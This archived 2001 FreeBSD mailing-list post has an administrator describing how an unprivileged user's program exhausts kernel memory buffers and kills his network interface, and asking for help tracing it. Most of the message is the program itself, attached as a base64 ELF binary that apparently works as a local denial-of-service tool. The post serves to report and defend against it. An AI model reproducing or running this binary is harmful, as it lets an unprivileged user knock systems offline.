Date: Wed, 16 May 2001 09:20:35 +0700 From: John Indra <john@office.naver.co.id> To: freebsd-questions@freebsd.org Cc: freebsd-current@freebsd.org Subject: My network is dead because of this program :( Message-ID: <20010516092035.A79109@office.naver.co.id>
next in thread | raw e-mail | index | archive | help
--BXVAT5kNtrzKuDFl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Dear all... First of all, really sorry for cross-posting... I am running a -CURRENT system (Apr 30th 2001). There is a user in my machine running this small program to DoS my xl0 interface. I doubt that this program is specifically designed for xl cards though. Once the program is started, it starts forking childs I assume. Then after sometime, this messages start popping to my screen: xl0: no memory for rx lists -- packet dropped After going to single user mode, cause I can't kill the offending program once it is running in multiuser mode (even kill -9 won't work on my system), then coming back to multiuser mode, I tried to run it and trace what it does with truss. But, truss didn't seem to output anything at all. Then, I saw the program state in top and it said the program is in mbuf state. I have searched all mailing lists archieves in http://www.freebsd.org/search/search.html#mailinglists but wierdly, there are no articles shown when I enter this as a query: "no memory for rx list" Can anyone help me trace what the program does? And how can I prevent the program to DoS my network interface? Even when the program is started by unprivileged user, it works, it DoS my network interface. Is this a bug? I have attached the offending program with this mail. Please don't run it on production system! You have been warned! Thank you very much... /john Live Free OR Die --BXVAT5kNtrzKuDFl Content-Type: application/octet-stream Content-Disposition: attachment; filename=x Content-Transfer-Encoding: base64 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 AAAAAAAAAAAAAAEAAAAAAAAAIwAAAAcAAAACAAAAEIEECBABAAAYAAAAAAAAAAAAAAAEAAAA AAAAADEAAAAFAAAAAgAAACiBBAgoAQAAqAAAAAQAAAAAAAAABAAAAAQAAAA3AAAACwAAAAIA AADQgQQI0AEAAHABAAAFAAAAAQAAAAQAAAAQAAAAPwAAAAMAAAACAAAAQIMECEADAADZAAAA AAAAAAAAAAABAAAAAAAAAEcAAAAJAAAAAgAAAByEBAgcBAAASAAAAAQAAAAIAAAABAAAAAgA AABQAAAAAQAAAAYAAABkhAQIZAQAAAsAAAAAAAAAAAAAAAQAAAAAAAAAVgAAAAEAAAAGAAAA cIQECHAEAACgAAAAAAAAAAAAAAAEAAAABAAAAFsAAAABAAAABgAAABCFBAgQBQAA5AIAAAAA AAAAAAAABAAAAAAAAABhAAAAAQAAAAYAAAD0hwQI9AcAAAYAAAAAAAAAAAAAAAQAAAAAAAAA ZwAAAAEAAAACAAAA+ocECPoHAAABAAAAAAAAAAAAAAABAAAAAAAAAG8AAAABAAAAAwAAAPyX BAj8BwAADAAAAAAAAAAAAAAABAAAAAAAAAB1AAAAAQAAAAMAAAAImAQICAgAAAQAAAAAAAAA AAAAAAQAAAAAAAAAfwAAAAEAAAADAAAADJgECAwIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAIYA AAABAAAAAwAAABSYBAgUCAAACAAAAAAAAAAAAAAABAAAAAAAAACNAAAAAQAAAAMAAAAcmAQI HAgAADAAAAAAAAAAAAAAAAQAAAAEAAAAkgAAAAYAAAADAAAATJgECEwIAABwAAAABQAAAAAA AAAEAAAACAAAAJsAAAAIAAAAAwAAALyYBAi8CAAAHAAAAAAAAAAAAAAABAAAAAAAAACgAAAA AQAAAAAAAAAAAAAAvAgAAMgAAAAAAAAAAAAAAAEAAAAAAAAAqQAAAAcAAAAAAAAAAAAAAIQJ AABQAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAADUCQAArwAAAAAAAAAAAAAA AQAAAAAAAAABAAAAAgAAAAAAAAAAAAAARA4AAHAEAAAXAAAALwAAAAQAAAAQAAAACQAAAAMA AAAAAAAAAAAAALQSAADGAQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9IAECAAAAAADAAEAAAAAABCBBAgAAAAAAwACAAAAAAAogQQIAAAAAAMAAwAAAAAA0IEECAAA AAADAAQAAAAAAECDBAgAAAAAAwAFAAAAAAAchAQIAAAAAAMABgAAAAAAZIQECAAAAAADAAcA AAAAAHCEBAgAAAAAAwAIAAAAAAAQhQQIAAAAAAMACQAAAAAA9IcECAAAAAADAAoAAAAAAPqH BAgAAAAAAwALAAAAAAD8lwQIAAAAAAMADAAAAAAACJgECAAAAAADAA0AAAAAAAyYBAgAAAAA AwAOAAAAAAAUmAQIAAAAAAMADwAAAAAAHJgECAAAAAADABAAAAAAAEyYBAgAAAAAAwARAAAA AAC8mAQIAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAA AAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAAAAAAAAAAAAAAAAAwAXAAEAAAAAAAAAAAAAAAQA 8f8MAAAAyIUECAAAAAAAAAkAGwAAAACYBAgAAAAAAQAMAB8AAAAUmAQIAAAAAAEADwAtAAAA BJgECAAAAAABAAwAOQAAAMiFBAgAAAAAAgAJAE8AAAAImAQIAAAAAAEADQBiAAAAHIYECAAA AAACAAkAbQAAALyYBAgYAAAAAQASAHcAAAAohgQIAAAAAAIACQCDAAAAUIYECAAAAAACAAkA jgAAAAiYBAgAAAAAAQAMAJwAAAAMmAQIAAAAAAEADgABAAAAAAAAAAAAAAAEAPH/DAAAALyH BAgAAAAAAAAJAKoAAAC8hwQIAAAAAAIACQDAAAAAEJgECAAAAAABAA4AgwAAAOiHBAgAAAAA AgAJAI4AAAAImAQIAAAAAAEADADNAAAAGJgECAAAAAABAA8A2gAAAAiYBAgAAAAAAQANAOgA AAAAAAAAAAAAAAQA8f8MAAAAXIYECAAAAAAAAAkA7AAAAICEBAgsAAAAEgAAAPIAAABMmAQI AAAAABEA8f/7AAAA9IcECAAAAAARAPH/AgEAAJCEBAh/AAAAEgAAAAgBAABkhAQIAAAAABIA BwAOAQAAoIQECAAAAAASAAAAFAEAANSYBAgEAAAAEQASABwBAAAAAAAAAAAAACAAAAA0AQAA 2JgECAAAAAARAPH/OAEAALCEBAgAAAAAEgAAAEMBAAD8lwQIBAAAABEADABOAQAAEIUECIMA AAASAAkAVQEAAMCEBAgAAAAAEgAAAFoBAAC8mAQIAAAAABEA8f9mAQAAXIYECF4BAAASAAkA awEAAPSHBAgAAAAAEgAKAHEBAADQhAQIbgAAABIAAAB4AQAA4IQECAAAAAASAAAAgwEAALyY BAgAAAAAEQDx/4oBAAAcmAQIAAAAABEA8f+gAQAA2JgECAAAAAARAPH/pQEAAPCEBAhkAAAA EgAAAKoBAAAAhQQIAAAAABIAAACwAQAAAAAAAAAAAAAgAAAAAGNydHN0dWZmLmMAZ2NjMl9j b21waWxlZC4AcC4zAF9fRFRPUl9MSVNUX18AY29tcGxldGVkLjQAX19kb19nbG9iYWxfZHRv cnNfYXV4AF9fRUhfRlJBTUVfQkVHSU5fXwBmaW5pX2R1bW15AG9iamVjdC4xMQBmcmFtZV9k dW1teQBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEAX19DVE9SX0xJU1RfXwBfX2RvX2dsb2Jh bF9jdG9yc19hdXgAX19DVE9SX0VORF9fAF9fRFRPUl9FTkRfXwBfX0ZSQU1FX0VORF9fAHgu YwBwYXVzZQBfRFlOQU1JQwBfZXRleHQAc2xlZXAAX2luaXQAd3JpdGUAZW52aXJvbgBfX2Rl cmVnaXN0ZXJfZnJhbWVfaW5mbwBlbmQAc2V0c29ja29wdABfX3Byb2duYW1lAF9zdGFydABm b3JrAF9fYnNzX3N0YXJ0AG1haW4AX2ZpbmkAYXRleGl0AHNvY2tldHBhaXIAX2VkYXRhAF9H TE9CQUxfT0ZGU0VUX1RBQkxFXwBfZW5kAGV4aXQAZmNudGwAX19yZWdpc3Rlcl9mcmFtZV9p bmZvAA== --BXVAT5kNtrzKuDFl-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010516092035.A79109>